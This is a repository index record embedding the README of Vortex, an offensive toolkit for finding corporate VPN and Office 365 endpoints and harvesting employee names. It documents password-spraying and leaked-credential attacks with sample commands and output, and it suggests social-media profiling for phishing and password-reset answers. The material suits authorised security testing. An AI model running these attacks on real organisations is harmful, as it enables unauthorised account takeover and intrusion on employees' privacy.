{"id":22050295,"url":"https://github.com/klezvirus/vortex","last_synced_at":"2025-04-05T21:10:40.863Z","repository":{"id":47055098,"uuid":"442417520","full_name":"klezVirus/vortex","owner":"klezVirus","description":"VPN Overall Reconnaissance, Testing, Enumeration and eXploitation Toolkit","archived":false,"fork":false,"pushed_at":"2023-11-02T13:21:21.000Z","size":46868,"stargazers_count":430,"open_issues_count":3,"forks_count":52,"subscribers_count":9,"default_branch":"master","last_synced_at":"2025-03-29T20:08:41.345Z","etag":null,"topics":["osint","osint-python","password-guessing","password-spraying","user-enumeration"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/klezVirus.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/funding.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"custom":"https://www.buymeacoffee.com/klezvirus","github":["klezvirus"]}},"created_at":"2021-12-28T09:44:20.000Z","updated_at":"2025-03-29T14:16:35.000Z","dependencies_parsed_at":"2022-08-27T19:02:18.324Z","dependency_job_id":"5867c3a4-997f-4895-9340-e17a3903dd66","html_url":"https://github.com/klezVirus/vortex","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/klezVirus%2Fvortex","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/klezVirus%2Fvortex/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/klezVirus%2Fvortex/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/klezVirus%2Fvortex/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/klezVirus","download_url":"https://codeload.github.com/klezVirus/vortex/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247399885,"owners_count":20932880,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["osint","osint-python","password-guessing","password-spraying","user-enumeration"],"created_at":"2024-11-30T14:21:00.597Z","updated_at":"2025-04-05T21:10:40.839Z","avatar_url":"https://github.com/klezVirus.png","language":"Python","readme":":triangular_flag_on_post: This is the public repository of vortex, for latest version and updates please consider supporting us through https://porchetta.industries/\n\n# Vortex\n\nVPN Overall Reconnaissance, Testing, Enumeration and Exploitation Toolkit\n\n## :triangular_flag_on_post: Sponsors\n\nIf you want to sponsors this project and have the latest updates on vortex, latest issues fixed, latest features, please support us on https://porchetta.industries/\n\n## Official Discord Channel\n\nCome hang out on Discord!\n\n[![Porchetta Industries](https://discordapp.com/api/guilds/736724457258745996/widget.png?style=banner3)](https://discord.gg/ycGXUxy)\n\n## Overview\n\nA very simple Python framework, inspired by [SprayingToolkit][1], that tries to \nautomate most of the process required to detect, enumerate and attack common O365 \nand VPN endpoints (like Cisco, Citrix, Fortinet, Pulse, etc...).\n\n### Why I developed it\n\nMake the VPN spraying phase much quicker and easier. Also, due to\nits flexibility, this tool can be added to an existing OSINT \nworkflow pretty easily.\n\n### What the tool can do for you\n\nVortex mainly provide assistance with performing the following tasks:\n\n- User Search and Collection\n - LinkedIn\n - Google\n - PwnDB\n- Password Leaks\n - PwnDB\n- Main Domain Identification\n - OWA\n - S4B/Lynk\n - ADFS\n- Subdomain Search\n - Enumeration\n - Bruteforce\n- VPN Endpoint Detection\n- Password Spraying/Guessing attacks\n - O365\n - Lynk/S4B\n - ADFS\n - IMAP\n - VPNs\n - Cisco\n - Citrix\n - FortiNet\n - Pulse Secure\n - SonicWall\n- Search profiles on Social Networks\n - Instagram\n - Facebook\n - Twitter\n - TikTok\n - Onlyfans\n\n## Installation\n\nInstall the pre-requisites with pip3 as follows:\n\n```\nsudo -H pip3 install -r requirements.txt\n```\n\n### Install with Virtualenv\n\nOtherwise, you can install the pre-requisites using a virtual environment:\n\n###### On Windows\n\n```\nvirtualenv venv\nvenv\\Scripts\\activate\npip install -r requirements.txt\n```\n\n###### On Linux\n\n```\npython3 -m virtualenv venv\nsource venv/bin/activate\npip install -r requirements.txt\n```\n\n## Usage\n\nUsing the tool is pretty straight forward, but there is a workflow to respect. The tool\nuses as SQLite database to store information about the current attack.\n\n### Workspace\n\nThe workspace represents the database file used by the tool. The name should be just a \nsimple name to label the current attack, project or target.\n\nTo each workspace is assigned one SQLite database. When you specify a workspace name,\nsuch as:\n\n```\npython manage.py -w workspace1\n```\n\nWhat you're actually saying is \"I want to operate on the `workspace1.db` file\".\n\n#### Workspace Initialisation\n\nIn order to work properly, Vortex needs to initialise the DB with the correct schemas.\nTo do that, the only thing to do is executing the command:\n\n```\npython manage.py -w workspace1 db -c init\n```\n\nIf a user tries to skip this phase, Vortex will just print to screen the correct command\nto launch first.\n\n```\n[-] Workspace not initialized. Please initialise it using:\n python manage.py -w workspace1 db -c init\n```\n\nInstead, when running the same command against an existing, initialised DB, Vortex\nwill ask for confirmation before overwrite the DB file:\n\n```\n[-] The DB file exists and it was initialised, overwrite?\n [y|n] $\u003e y\n```\n\n### Actions and commands\n\nVortex works with one positional argument, the 'Action', and other keyed values.\n\nThe most important among them is the command argument (`-c cmd`). In combination with\nthe action value, the command define what Vortex should do. \n\nIt is possible to see the list of supported actions from the Help:\n\n```\npython manage.py -h\n\nVortex: VPN Overall Reconnaissance, Enumeration and eXploitation\n\npositional arguments:\n {db,domain,import,office,profile,search,tor,validate,vpn}\n Action to execute\n\noptional arguments:\n -h, --help show this help message and exit\n -w WORKSPACE, --workspace WORKSPACE\n Workspace to use\n -c COMMAND, --command COMMAND\n Command for the action\n -D DOMAIN, --domain DOMAIN\n Domain under attack\n -C COMPANY, --company COMPANY\n Company under attack\n -l LOCATION, --location LOCATION\n Location of the company under attack (IE, UK, US, ...)\n -u URL, --url URL VPN Endpoint Origin (schema://domain:port)\n -t ENDPOINT_TYPE, --endpoint-type ENDPOINT_TYPE\n Target Endpoint Type\n -U USER, --user USER User name\n -E EMAIL, --email EMAIL\n User email\n -N NAME, --name NAME User full name\n -R ROLE, --role ROLE User job\n -s SQL, --sql SQL SQL statement\n -O EXPORT_FILE, --export-file EXPORT_FILE\n Export file\n -Q QUOTES, --quotes QUOTES\n Produce an Excel safe CSV\n -nh, --no-headers Remove CSV headers\n -k KEYWORDS, --keywords KEYWORDS\n Search keywords\n -P PASSWORDS_FILE, --passwords-file PASSWORDS_FILE\n Password file for spraying\n -L, --leaks Use leaks for spraying\n -I IMPORT_FILE, --import-file IMPORT_FILE\n Import file\n```\n\n#### Dynamic argument inputting\n\nAs observable from the help, the list of supported commands per action is not specified\nanywhere. This is because is not necessary to specify a command directly.\nIndeed, if a command is not specified, Vortex will ask the user to select one \namong the commands available for the specified action.\n\n```\npython manage.py -w workspace1 db\n\n ,d#####F^ ,yy############yy ^9#######,\n ,######\" y###################by ^9######,\n ######^ y#####F\"\" ^\"9######y \"######]\n d#####^ ,#####\" by klezVirus ^9#####, ^######,\n,#####] ,####F yy#######y, ^9####b ^######\n[##### ####F ,###F\"\"'\"9####, 9####] 9#####\n#####F [#### ,##F^ yy \"###b 9####, ^#####]\n#####] [###] ### dF\"\"#b ^###] ^####] #####]\n9####b [#### 9##, 9bd [#] [##b ##### [#####\n[##### ####, 9##y, ,y##^ d##F ##### [####]\n #####b ^####y ^\"#####\" d###^ ,####] d#####\n [#####, ^####by ,d###^ d####^ #####F\n 9#####y \"#####byyyyyyd####F^ d####F [#####9\n 9#####b, \"\"############\"^ ,d####F ,######\n ^######b, \"\"'\"\"'\"^ ,d#####F d#####F\n\n[*] Select a command:\n0 : init\n1 : sql\n2 : add-endpoint\n3 : add-user\n4 : drop-user\n5 : truncate-table\n6 : export\n $\u003e\n```\n\nThe same applies for argument needed by a specific routine. If an argument is \ndifficult to be inputted at runtime, Vortex will kindly remind the user that \nthe parameter is required. Otherwise, Vortex will guide the user into selecting\nor inputting the necessary arguments.\n\nFor example, if a user wanted to export a specific table or even a column, the only required thing \nwould be to launch the export command, as observable from the image, below:\n\n![Export Wizard](./images/export-wizard.gif)\n\nThis kind of behaviour makes Vortex really easy to use.\n\n### General Workflow\n\nVortex has been designed to adhere to a specific operation workflow, summarized in the below\nschema:\n\n![General Workflow](./images/vortex.png)\n\n### Operations\n\n#### Collect users\n\nCollect valid users for a specific target can be done using three different sources:\n\n* LinkedIn\n\nThis source has been removed for infringement of LinkedIn user policies. \nYou can still operate on LinkedIn using [GoMapEnum](https://github.com/nodauf/GoMapEnum), \nand then import the email addresses using the `import` command.\n\nAgain, please be aware that using this functionality is a breach of the LinkedIn\nuser agreement, as observable at point [8.2](https://www.linkedin.com/legal/user-agreement#dos) \nof the LinkedIn user agreement:\n\n\u003e You agree that you will not: [...]\n\u003e 2. Develop, support or use software, devices, scripts, robots or any other means or processes (including crawlers, browser plugins and add-ons or any other technology) to scrape the Services or otherwise copy profiles and other data from the Services;\n\n* CrossLinked\n\nTo partially replace the above functionality, the tool embeds an adapted version of\n[CrossLinked](https://github.com/m8r0wn/CrossLinked). This tool will try to detect employees of a company using Google and Bing.\nIt's certainly not the same as directly searching on LinkedIn, but it's\npretty useful.\n\nIn order to operate correctly, the tool will ask the user which format should be used\nfor usernames (i.e. john.doe, j.doe or d.john) and which is the standard domain \nused by the target domain.\n\n```\npython manage.py -w workspace1 search -c crosslinked -D evilcorp.com -C \"Evil Corporation\"\n\n ,d#####F^ ,yy############yy ^9#######,\n ,######\" y###################by ^9######,\n ######^ y#####F\"\" ^\"9######y \"######]\n d#####^ ,#####\" by klezVirus ^9#####, ^######,\n,#####] ,####F yy#######y, ^9####b ^######\n[##### ####F ,###F\"\"'\"9####, 9####] 9#####\n#####F [#### ,##F^ yy \"###b 9####, ^#####]\n#####] [###] ### dF\"\"#b ^###] ^####] #####]\n9####b [#### 9##, 9bd [#] [##b ##### [#####\n[##### ####, 9##y, ,y##^ d##F ##### [####]\n #####b ^####y ^\"#####\" d###^ ,####] d#####\n [#####, ^####by ,d###^ d####^ #####F\n 9#####y \"#####byyyyyyd####F^ d####F [#####9\n 9#####b, \"\"############\"^ ,d####F ,######\n ^######b, \"\"'\"\"'\"^ ,d#####F d#####F\n\n[+] Select a format for usernames\n 0: firstlast\n 1: lastfirst\n 2: first.last\n 3: last.first\n 4: last.f\n 5: flast\n 6: lfirst\n 7: f.last\n 8: l.first\n 9: first\n 10: last\n $\u003e 2\n[*] Starting search on Google and Bing with CrossLinked\n [\u003e] Searching google for valid employee names at \"Evil Corporation\"\n [\u003e] Searching bing for valid employee names at \"Evil Corporation\"\n [\u003e] Found 133 LinkedIn accounts!\n[*] Updating DB ...\n[+] Done!\n```\n\n* Google\n\nThis source is operated using a stripped, modified version of [theHarvester]().\nThe tool will try to extract names/e-mails from Google (Passive Gathering) using Google\nDorks, and from the company website (Active Gathering). \n\n```\npython manage.py -w workspace1 search -c google -D evilcorp.com\n\n[*] Starting passive/active search on Google\n[*] (PASSIVE) Searching for emails NOT within the domain's site: evilcorp.com -site:evilcorp.com\n[*] (ACTIVE) Searching for emails within the domain's sites: evilcorp.com\n[+] Scraping any emails from: https://evilcorp.com\n[+] Scraping any emails from: https://www.facebook.com/EvilCorp/\n...\n\n[+] 2 unique emails found:\n---------------------------\nelliot.alderson@evilcorp.com\ntyrell.wellick@evilcorp.com\n [\u003e] Found 2 mail \n[*] Updating DB ...\n[+] Done!\n```\n\n* PwnDB\n\nThis source is operated using a ported version of the one implemented in [sn0int](https://github.com/kpcyrd/sn0int).\n\n**Note**: this functionality requires to be connected to the TOR network. On Windows, it is possible to use the embedded\nversion provided with Vortex. On Linux, instead, it is necessary to install the tor package (i.e. `sudo apt-get install tor` on Kali).\n\n\n##### Start TOR\n\n```\npython manage.py -w workspace1 tor -c start\n\n[*] Starting TOR Browser, click on connect\n```\n##### Enumerate on on PwnDB\n\n```\npython manage.py -w workspace1 search -c pwndb -D evilcorp.com\n\n[*] Starting search on PwnDB\n [\u003e] Found 493 leaked accounts!\n[*] Updating DB ...\n[+] Done!\n```\n\n##### Stop TOR\n```\npython manage.py -w workspace1 tor -c stop\n\n[*] Stopping TOR browser\n```\n\n#### Collect endpoints\n\nVortex uses mainly two macro-categories for endpoints: VPN and Microsoft (Office) endpoints.\nA target can be added both as an Office or VPN endpoint, and Vortex will try and validate the \nendpoint as an Office, or VPN endpoint, respectively, using a range of validators.\n\n##### Add an office endpoint\n\nLet's make it clear with an example. The user needs to attack the target `evilcorp.com`,\nand want to check whether the domain is an OWA, Lync, ADFS, or O365 target.\n\n```\npython manage.py -w workspace1 office -c add -D evilcorp.com\n\n[#] OWA domain appears to be hosted internally\n[+] evilcorp.com is a valid OWA target!\n[-] evilcorp.com does not seem a valid LYNK target\n[-] evilcorp.com does not seem a valid ADFS target\n[-] evilcorp.com does not seem a valid IMAP target\n[+] evilcorp.com is a valid O365 target!\n```\n\n##### Search subdomains for VPN endpoints\n\nFor VPN endpoints, the user can perform a subdomain search in order to find hosts running VPN Web Logins,\nlike this:\n\n```\npython manage.py -w workspace1 domain -c enum -D evilcorp.com\n\n ,d#####F^ ,yy############yy ^9#######,\n ,######\" y###################by ^9######,\n ######^ y#####F\"\" ^\"9######y \"######]\n d#####^ ,#####\" by klezVirus ^9#####, ^######,\n,#####] ,####F yy#######y, ^9####b ^######\n[##### ####F ,###F\"\"'\"9####, 9####] 9#####\n#####F [#### ,##F^ yy \"###b 9####, ^#####]\n#####] [###] ### dF\"\"#b ^###] ^####] #####]\n9####b [#### 9##, 9bd [#] [##b ##### [#####\n[##### ####, 9##y, ,y##^ d##F ##### [####]\n #####b ^####y ^\"#####\" d###^ ,####] d#####\n [#####, ^####by ,d###^ d####^ #####F\n 9#####y \"#####byyyyyyd####F^ d####F [#####9\n 9#####b, \"\"############\"^ ,d####F ,######\n ^######b, \"\"'\"\"'\"^ ,d#####F d#####F\n\n[*] Starting subdomain passive enumeration\n [\u003e] Found 10 subdomains\n [$] Elapsed time: 18.360117197036743\n[*] Enumerating potential VPN endpoints (HTTPS on 443, 10443)\n [\u003e] Found 1 hosts running an SSL webserver\n [$] Elapsed time: 18.916626691818237\n[*] Trying to detect hosts with VPN web-login\n [\u003e] Found 1 hosts with a VPN web login\n [$] Elapsed time: 32.919618368148804\n[*] Updating DB...\n [+] Adding vpn.evilcorp.com:443 as a pulse target\n [\u003e] Elapsed time: 18.920615434646606\n[+] Done\n```\n\n##### Manually add a VPN endpoint\n\nTo manually add VPN endpoints, of course, specifying the top level domain would probably not be enough.\nThe correct way would be to specify a specific subdomain along with the specific port the VPN Web Server is \nrunning on.\n\n```\npython manage.py -w workspace1 vpn -c add -D vpn.evilcorp.com:443\n\n[+] vpn.evilcorp.com:443 is a pulse target!\n```\n\n#### Perform a password spray or bruteforce attack against OWA, ADFS, LYNC, or O365\n\nTo perform a password spray or even bruteforce attack, the only required \nresource is a password list in the form of a text file, with one password \nper line.\n\n```\npython manage.py -w workspace1 office -c attack -P passwords.txt\n\n ,d#####F^ ,yy############yy ^9#######,\n ,######\" y###################by ^9######,\n ######^ y#####F\"\" ^\"9######y \"######]\n d#####^ ,#####\" by klezVirus ^9#####, ^######,\n,#####] ,####F yy#######y, ^9####b ^######\n[##### ####F ,###F\"\"'\"9####, 9####] 9#####\n#####F [#### ,##F^ yy \"###b 9####, ^#####]\n#####] [###] ### dF\"\"#b ^###] ^####] #####]\n9####b [#### 9##, 9bd [#] [##b ##### [#####\n[##### ####, 9##y, ,y##^ d##F ##### [####]\n #####b ^####y ^\"#####\" d###^ ,####] d#####\n [#####, ^####by ,d###^ d####^ #####F\n 9#####y \"#####byyyyyyd####F^ d####F [#####9\n 9#####b, \"\"############\"^ ,d####F ,######\n ^######b, \"\"'\"\"'\"^ ,d#####F d#####F\n\n[*] Choose an endpoint type to attack, or all to attack any supported endpoint\n0 : owa\n1 : lync\n2 : imap\n3 : adfs\n4 : o365\n5 : all\n $\u003e 4\n[*] Running O365Enumerator\n [-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid.\n [+] tyrell.wellick@evilcorp.com:Joanna2021! is valid!\n [\u003e] Found 1 valid logins\n[*] Updating Db...\n[+] Done\n```\n\n#### Perform a password spray or bruteforce attack against VPN endpoints\n\nTo perform a password spray or even bruteforce attack, the only required \nresource is a password list in the form of a text file, with one password \nper line.\n\n```\npython manage.py -w workspace1 vpn -c attack -P passwords.txt\n\n ,d#####F^ ,yy############yy ^9#######,\n ,######\" y###################by ^9######,\n ######^ y#####F\"\" ^\"9######y \"######]\n d#####^ ,#####\" by klezVirus ^9#####, ^######,\n,#####] ,####F yy#######y, ^9####b ^######\n[##### ####F ,###F\"\"'\"9####, 9####] 9#####\n#####F [#### ,##F^ yy \"###b 9####, ^#####]\n#####] [###] ### dF\"\"#b ^###] ^####] #####]\n9####b [#### 9##, 9bd [#] [##b ##### [#####\n[##### ####, 9##y, ,y##^ d##F ##### [####]\n #####b ^####y ^\"#####\" d###^ ,####] d#####\n [#####, ^####by ,d###^ d####^ #####F\n 9#####y \"#####byyyyyyd####F^ d####F [#####9\n 9#####b, \"\"############\"^ ,d####F ,######\n ^######b, \"\"'\"\"'\"^ ,d#####F d#####F\n\n[*] Choose an endpoint type to attack, or all to attack any supported endpoint\n0 : cisco\n1 : citrix\n2 : citrixlegacy\n3 : fortinet\n4 : pulse\n5 : sonicwall\n6 : all\n $\u003e 6\n[*] Attacking vpn.evilcorp.com:443\n [-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid.\n [+] tyrell.wellick@evilcorp.com:Joanna2021! is valid!\n [\u003e] Found 1 valid logins\n[*] Updating Db...\n[+] Done\n```\n\n#### Perform a password spray or bruteforce using leaked credentials\n\nAs Vortex keeps track of credentials leaked on PwnDB, a user can select\nto test all leaked credentials instead of providing a password file.\n\nHowever, consider this behaviour is much different to a normal password spray.\nIn a normal password spraying attack, indeed, a single password is tried against \nall users. In a leaked credentials attack, the leaked credentials is tested against \nthe specific user it was leaked with. So, as an example, if Vortex found\nthe leaks:\n\n```\nUser Leaks\n---------------------------- ----------------------------\nelliot.alderson@evilcorp.com [\"ISecretlyLoveAngela2020!\"]\ntom.wellick@evilcorp.com [\"Puppy19!\", \"MySweetJ111!\"]\n```\n\nVortex will operate the following attempts, and just the following:\n\n```\nelliot.alderson@evilcorp.com:ISecretlyLoveAngela2020!\ntom.wellick@evilcorp.com:Puppy19!\ntom.wellick@evilcorp.com:MySweetJ111!\n```\n\nTo perform this attack, no password file is needed, but it's required to set\nthe (-L, or --leaks) parameter.\n\n```\npython manage.py -w workspace1 vpn -c attack -L\n\n ,d#####F^ ,yy############yy ^9#######,\n ,######\" y###################by ^9######,\n ######^ y#####F\"\" ^\"9######y \"######]\n d#####^ ,#####\" by klezVirus ^9#####, ^######,\n,#####] ,####F yy#######y, ^9####b ^######\n[##### ####F ,###F\"\"'\"9####, 9####] 9#####\n#####F [#### ,##F^ yy \"###b 9####, ^#####]\n#####] [###] ### dF\"\"#b ^###] ^####] #####]\n9####b [#### 9##, 9bd [#] [##b ##### [#####\n[##### ####, 9##y, ,y##^ d##F ##### [####]\n #####b ^####y ^\"#####\" d###^ ,####] d#####\n [#####, ^####by ,d###^ d####^ #####F\n 9#####y \"#####byyyyyyd####F^ d####F [#####9\n 9#####b, \"\"############\"^ ,d####F ,######\n ^######b, \"\"'\"\"'\"^ ,d#####F d#####F\n\n[*] Choose an endpoint type to attack, or all to attack any supported endpoint\n0 : cisco\n1 : citrix\n2 : citrixlegacy\n3 : fortinet\n4 : pulse\n5 : sonicwall\n6 : all\n $\u003e 6\n[*] Attacking vpn.evilcorp.com:443\n [+] elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020! is valid!\n [-] tyrell.wellick@evilcorp.com:Puppy19! is not valid.\n [-] tyrell.wellick@evilcorp.com:MySweetJ111! is not valid.\n [\u003e] Found 1 valid logins\n[*] Updating Db...\n[+] Done\n```\n\nThat's mostly it. Sometimes the tool can ask for more information before performing\nan attack, such as selecting the VPN realm/group.\n\n##### Showing results\n\nAt any time, you can see valid logins you found using the following command:\n\n```\npython manage.py db -w workspace1 -c found-logins\n[+] Valid Logins Collected:\n ID Target E-Mail Password\n---- -------------------- ---------------------------- ------------------------\n 1 vpn.evilcorp.com:443 tom.wellick@evilcorp.com Joanna2021!\n 2 vpn.evilcorp.com:443 elliot.alderson@evilcorp.com ISecretlyLoveAngela2020!\n[+] Done\n```\n\n#### Searching Social Network Profiles\n\nSometimes, in big engagements, knowing a bit more about our targets helped us in \nbreaching their defenses, such as using personal emails or social accounts for phishing,\nor also find answers to password resets security questions).\n\nFor this reason, I've integrated [Profil3r](https://github.com/Greyjedix/Profil3r). This tool\ntries to identify social network accounts potentially related to an individual. \n\n**IMPORTANT NOTE**: Profil3r tries to locate valid profiles using name mashing. It can't\nguarantee the found profiles are really related to the target person. For this reason, the \nprofiles are not automatically added to Vortex DB.\n\nCurrently, it is possible to operate with Profil3r in two modes:\n\n* single-mode\n* multi-mode\n\nThe single-mode operates on a set of keywords provided by the user:\n\n```\npython manage.py -w workspace1 profile -c single -k elliot -k alderson\n\n ,d#####F^ ,yy############yy ^9#######,\n ,######\" y###################by ^9######,\n ######^ y#####F\"\" ^\"9######y \"######]\n d#####^ ,#####\" by klezVirus ^9#####, ^######,\n,#####] ,####F yy#######y, ^9####b ^######\n[##### ####F ,###F\"\"'\"9####, 9####] 9#####\n#####F [#### ,##F^ yy \"###b 9####, ^#####]\n#####] [###] ### dF\"\"#b ^###] ^####] #####]\n9####b [#### 9##, 9bd [#] [##b ##### [#####\n[##### ####, 9##y, ,y##^ d##F ##### [####]\n #####b ^####y ^\"#####\" d###^ ,####] d#####\n [#####, ^####by ,d###^ d####^ #####F\n 9#####y \"#####byyyyyyd####F^ d####F [#####9\n 9#####b, \"\"############\"^ ,d####F ,######\n ^######b, \"\"'\"\"'\"^ ,d#####F d#####F\n\n[*] Starting single profile search\n...\n└── FACEBOOK ✔️\n ├──https://facebook.com/elliot\n ├──https://facebook.com/alderson\n ├──https://facebook.com/elliotalderson\n ├──https://facebook.com/aldersonelliot\n ├──https://facebook.com/elliot.alderson\n ├──https://facebook.com/alderson.elliot\n...\n[+] Done!\n```\n\nThe multi-mode operates on first and last name of each user in the DB. Any additional keyword passed in multi-mode\nis used in combination with users' first and last name. So, as example, you can use additional names or numbers \nto customise the profile search.\n\n```\npython manage.py -w workspace1 profile -c multi -k 90\n\n ,d#####F^ ,yy############yy ^9#######,\n ,######\" y###################by ^9######,\n ######^ y#####F\"\" ^\"9######y \"######]\n d#####^ ,#####\" by klezVirus ^9#####, ^######,\n,#####] ,####F yy#######y, ^9####b ^######\n[##### ####F ,###F\"\"'\"9####, 9####] 9#####\n#####F [#### ,##F^ yy \"###b 9####, ^#####]\n#####] [###] ### dF\"\"#b ^###] ^####] #####]\n9####b [#### 9##, 9bd [#] [##b ##### [#####\n[##### ####, 9##y, ,y##^ d##F ##### [####]\n #####b ^####y ^\"#####\" d###^ ,####] d#####\n [#####, ^####by ,d###^ d####^ #####F\n 9#####y \"#####byyyyyyd####F^ d####F [#####9\n 9#####b, \"\"############\"^ ,d####F ,######\n ^######b, \"\"'\"\"'\"^ ,d#####F d#####F\n\n[*] Starting per-user profile search\n [\u003e] Searching profiles for Elliot Alderson. Additional keywords: 90\n...\n└── TWITTER ✔️\n ├──https://twitter.com/ElliotAlderson\n ├──https://twitter.com/AldersonElliot\n ├──https://twitter.com/Elliot90\n ├──https://twitter.com/90Elliot\n ├──https://twitter.com/Alderson90\n...\n [\u003e] Searching profiles for Tom Wellick. Additional keywords: 90\n...\n└── TWITTER ✔️\n ├──https://twitter.com/Tom\n ├──https://twitter.com/Wellick\n ├──https://twitter.com/90\n ├──https://twitter.com/Tom90\n ├──https://twitter.com/90Tom\n...\n[+] Done!\n```\n\n#### Importing External Data\n\nVortex offers also support for importing external data related to users or endpoints.\nCurrently, only plain text files are supported and there is limited support for CSV as well.\n\nThe data types which can be imported so far are:\n\n* E-mail addresses\n* Usernames\n* VPN endpoints (target:port)\n* Domains\n* ~~Leaks from PwnDB~~ DEPRECATED: just use the search command\n* LinkedIn-data extracted with ~~Blues~~\n\nEvery data-type is supported in normal text-file format, one element per line.\n\n## Roadmap\n\nNew functionalities are coming soon (2022):\n\n* Smart password list generation\n* Data extraction and correlation\n\nPlease submit bugs, suggestions, or feature requests. \n\n## Credits\n\n* [byt3bl33d3r](https://twitter.com/byt3bl33d3r): For his amazing work on [SprayingToolkit][1]. which inspired the project\n* [nodauf](https://twitter.com/nodauf): For his work on [GoMapEnum](https://github.com/nodauf/GoMapEnum), which gave me other ideas\n* [quasart](https://github.com/quasart): The logo was generated with [spiral](https://github.com/quasart/spiral)\n* [m8r0wn](https://twitter.com/m8r0wn): For his work on [CrossLinked](https://github.com/m8r0wn/CrossLinked), which is really an awesome tool\n* [Greyjedix](https://github.com/Greyjedix/): For his work on [Profil3r](https://github.com/Greyjedix/Profil3r), which is very useful tool in certain circumstances\n\n[1]: https://github.com/byt3bl33d3r/SprayingToolkit\n","funding_links":["https://www.buymeacoffee.com/klezvirus","https://github.com/sponsors/klezvirus"],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fklezvirus%2Fvortex","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fklezvirus%2Fvortex","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fklezvirus%2Fvortex/lists"}